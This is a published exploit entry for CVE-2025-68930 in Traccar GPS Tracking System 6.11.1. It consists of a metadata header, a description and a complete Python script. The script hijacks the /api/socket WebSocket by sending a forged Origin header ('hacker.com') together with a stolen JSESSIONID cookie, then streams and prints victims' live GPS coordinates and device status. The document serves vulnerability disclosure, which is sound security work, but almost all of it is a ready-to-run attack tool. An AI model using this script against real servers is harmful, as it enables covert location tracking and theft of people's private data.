Traccar GPS Tracking System 6.11.1 – Cross-Site WebSocket Hijacking (CSWSH)

# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930

"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket). 
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header 
along with a victim's valid JSESSIONID. This allows the attacker to hijack the 
WebSocket connection and leak real-time sensitive data, including GPS coordinates 
and device status.

Requirements:
pip install websocket-client
"""

import websocket
import argparse
import sys

def on_message(ws, message):
    print(f"[+] DATA LEAKED: {message}")

def on_error(ws, error):
    print(f"[-] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[-] Connection closed.")

def on_open(ws):
    print("[*] WebSocket Handshake Successful!")
    print("[*] Connection upgraded. Streaming real-time sensitive data...n")

def main():
    parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
    parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
    parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
    parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
    
    args = parser.parse_args()

    # Construct the WebSocket URL
    url = f"ws://{args.target}:{args.port}/api/socket"
    
    # Malicious headers triggering the bypass
    # The 'Origin' header is set to an external domain to demonstrate lack of validation.
    headers = [
        "Origin: http://hacker.com",
        f"Cookie: JSESSIONID={args.cookie}"
    ]

    print(f"""
    ================================================
    TRACCAR GPS TRACKER - CSWSH EXPLOIT
    Exploit Author: Hazar Taspinar
    CVE: CVE-2025-68930
    Target: {url}
    ================================================
    """)

    # Initiate WebSocket connection
    ws = websocket.WebSocketApp(url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close,
                                on_open=on_open,
                                header=headers)
    
    try:
        ws.run_forever()
    except KeyboardInterrupt:
        print("n[*] Exploit stopped by user.")
        sys.exit(0)

if __name__ == "__main__":
    main()